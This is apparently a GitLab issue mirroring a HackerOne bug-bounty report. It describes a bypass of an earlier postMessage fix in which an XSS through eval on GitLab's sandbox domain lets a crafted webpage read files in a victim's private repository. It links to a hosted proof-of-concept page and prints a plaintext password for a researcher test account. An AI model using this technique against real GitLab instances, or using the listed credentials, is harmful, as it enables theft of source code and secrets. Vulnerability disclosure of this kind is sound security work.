Skip to content

Read any repo file (incl. private ones) via postMessage on both gitlab.com/self-hosted instance (bypass #1417680)

HackerOne report #1699831 by niraeth on 2022-09-14, assigned to GitLab Team:

Report | Attachments | How To Reproduce

Report

Summary

An attacker can use a specially crafted webpage to read the content of a victim's repo via postMessage when the victim uses the Live Preview feature.

The attack vector and impact is the same as report #1417680 or CVE-2022-2907 . Although it was fixed in the previous report, I have found a workaround/bypass for it.

Steps to reproduce

The reproduction below will be done on gitlab.com, but it works (and I have tested) for self-hosted instances as well. For self-hosted instances, you will need to manually enable the Live Preview feature for the exploit to work. You can follow the guide here to enable the feature.

Reproduce for gitlab.com:

  1. Login to https://gitlab.com using the credentials: email niraeth+100@wearehackerone.com and password 89J6\U^_tV?/yY7X
  2. Go to the poc page at https://exploits.niraeth.com/sites/gitlab/postMessage%20readFile%202/readFile%203499E693D443B4E6ED4CE8D0F815F991.html
  3. Follow instructions on the poc page.

Reproduce for your own instance:

  1. Download the HTML file : readFile_3499E693D443B4E6ED4CE8D0F815F991.html
  2. Modify the URL shown below
    URL_to_be_modified.JPG
  3. Follow the instructions above (Reproduce for gitlab.com)
Vulnerable Code / Bypass Details

First, take a look at the fix implemented from the previous report. You can see below that it checks for the message's source, to check that it comes from this.frameWindow. this.frameWindow is an iframe that points to https://sandbox-prod.gitlab-static.net/. $id is now also checked against this.channelId (a random int from 100000-999999)
fix_from_prev_report.JPG

However, because there is a XSS vulnerability at https://sandbox-prod.gitlab-static.net/, an attacker can use this XSS to call postMessage and bypass the source check. The said XSS can be triggered via postMessage due to vulnerable code shown below

  1. This is the message event listener
    cframe_-1-_message_listener.JPG

  2. Eventually, the code below gets executed. The XSS is executed by the line eval(e.command)
    cframe_-_2-_eval.JPG

Impact
  1. Read files of private repo - steal source code etc
  2. Read sensitive files such as .gitlab-ci.yml which is almost guaranteed to contain things like api keys, ssh keys that are necessary for the pipeline to work. This would then enable an attacker to further their attack, e.g gaining remote access to a server.
Examples

The repo used for this PoC is available at https://gitlab.com/nicgene/vue-todo . However, any other project/repo that is properly configured for the Live Preview feature would work too.
Note that the above repo is not controlled by me.

What is the current bug behavior?

Attacker is able to read repo files

What is the expected correct behavior?

The attacker should not be able to communicate with the message event listener.

Relevant logs and/or screenshots

Nil. Refer to the section Vulnerable Code / Bypass Details for screenshots of the affected code

Output of checks

This bug happens on GitLab.com and Self Hosted GitLab

Results of GitLab environment info
System information  
System:         Ubuntu 20.04  
Current User:   git  
Using RVM:      no  
Ruby Version:   2.7.5p203  
Gem Version:    3.1.6  
Bundler Version:2.3.15  
Rake Version:   13.0.6  
Redis Version:  6.2.7  
Sidekiq Version:6.4.0  
Go Version:     unknown

GitLab information  
Version:        15.3.3  
Revision:       c629a47f87f  
Directory:      /opt/gitlab/embedded/service/gitlab-rails  
DB Adapter:     PostgreSQL  
DB Version:     13.6  
URL:            http://ec2-13-228-76-134.ap-southeast-1.compute.amazonaws.com  
HTTP Clone URL: http://ec2-13-228-76-134.ap-southeast-1.compute.amazonaws.com/some-group/some-project.git  
SSH Clone URL:  git@ec2-13-228-76-134.ap-southeast-1.compute.amazonaws.com:some-group/some-project.git  
Using LDAP:     no  
Using Omniauth: yes  
Omniauth Providers:

GitLab Shell  
Version:        14.10.0  
Repository storage paths:  
- default:      /var/opt/gitlab/git-data/repositories  
GitLab Shell path:              /opt/gitlab/embedded/service/gitlab-shell

Impact

Mentioned in the report.

Attachments

Warning: Attachments received through HackerOne, please exercise caution!

How To Reproduce

Please add reproducibility information to this section: